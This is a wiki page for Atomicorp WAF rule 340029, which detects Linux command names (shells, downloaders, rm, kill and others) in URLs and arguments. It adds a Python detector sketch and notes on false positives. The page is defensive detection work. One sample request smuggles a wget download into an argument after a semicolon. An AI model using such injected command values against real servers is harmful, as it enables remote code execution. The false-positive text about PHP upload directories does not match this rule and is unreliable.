WAF 340029

From Atomicorp Wiki
Revision as of 15:38, 12 December 2013 by Mshinn (Talk | contribs)

Rule: 340029
Status: Active
Alert Message: Atomicorp.com WAF Rules: Possible command in REQUEST_URI or Argument

Description

This rule detects when a Linux command is used in a URL or an argument. It specifically looks for these types of commands:

  • process management tools (kill, nice, etc.)
  • file management tools (cp, chown, rm, etc.)
  • shells (bash, tcsh, etc.)
  • compilers (gcc, c++, etc.)
  • web downloading tools (wget, curl, etc.)
  • interpreters (perl, php, etc.)
  • other downloading tools (scp, ftp, etc.)


Some attack tools are known to blindly probe for software tools to see whether they can use them. Therefore, the fact that this rule is triggered does not mean that the software tool is installed on the system.

If your system is being targeted with these kinds of attacks, we do not recommend that you disable this rule. This rule may be telling you that someone is attacking your system, and therefore you should block this source. Please see the blog post referenced below for information about leaving rules enabled for applications you may not have installed.
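
The following is an added example, not Atomicorp's rule: a simplified Python sketch of this kind of check, run over constructed request URIs. The command list is taken from the categories above; the token-boundary regex, the function name inspect() and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Command names from the categories on this page. The real rule's pattern is
# not published here, so this list and the regex below are assumptions.
CATEGORIES = {
    "process management": ["kill", "nice"],
    "file management": ["cp", "chown", "rm"],
    "shell": ["bash", "tcsh"],
    "compiler": ["gcc", "c++"],
    "web download": ["wget", "curl"],
    "interpreter": ["perl", "php"],
    "other download": ["scp", "ftp"],
}

def _pattern(cmd):
    # Match the command only as a separate token: after start-of-value,
    # whitespace, a shell separator or "/", and before end, whitespace or a separator.
    return re.compile(r"(?:^|[\s;|&`(/])" + re.escape(cmd) + r"(?=$|[\s;|&`)])", re.I)

RULES = [(cat, cmd, _pattern(cmd)) for cat, cmds in CATEGORIES.items() for cmd in cmds]

def inspect(request_uri):
    """Return sorted (location, category, command) hits for one request URI."""
    parts = urlsplit(request_uri)
    # Inspect the decoded path and each decoded argument value separately.
    targets = [("REQUEST_URI", unquote(parts.path))]
    targets += [("ARGS:" + k, v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    hits = set()
    for loc, value in targets:
        for cat, cmd, rx in RULES:
            if rx.search(value):
                hits.add((loc, cat, cmd))
    return sorted(hits)

# Constructed sample requests, not taken from real logs.
SAMPLES = [
    "/cgi-bin/test.cgi?host=127.0.0.1%3Bwget+http%3A%2F%2Fexample.invalid%2Fx",
    "/index.php?page=about",        # ".php" extension is not a command token
    "/shop/item?name=nice+shoes",   # ordinary word that collides with a command name
    "/docs/curl-howto.html",        # command name inside a longer file name
]

if __name__ == "__main__":
    for uri in SAMPLES:
        # A hit describes the request text only; it says nothing about whether
        # the named tool exists on the server.
        print(uri, "->", inspect(uri) or "no match")
```

The third sample shows how an ordinary word in an argument can trigger a match, which is the kind of case to review before tuning the rule.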

Troubleshooting

False Positives

If your CMS is known to use this directory for PHP files, and is known to securely prevent users from uploading PHP files to this directory, then this may be a false positive. Please check with your web application vendor to determine if this is true.

Tuning Guidance

If you want to disable this rule, please see the Tuning the Atomicorp WAF Rules page for basic information.

Additional Information

Blog Articles

None.

Similar Rules

None.

Knowledge Base Articles

None.

Outside References

None.

Notes
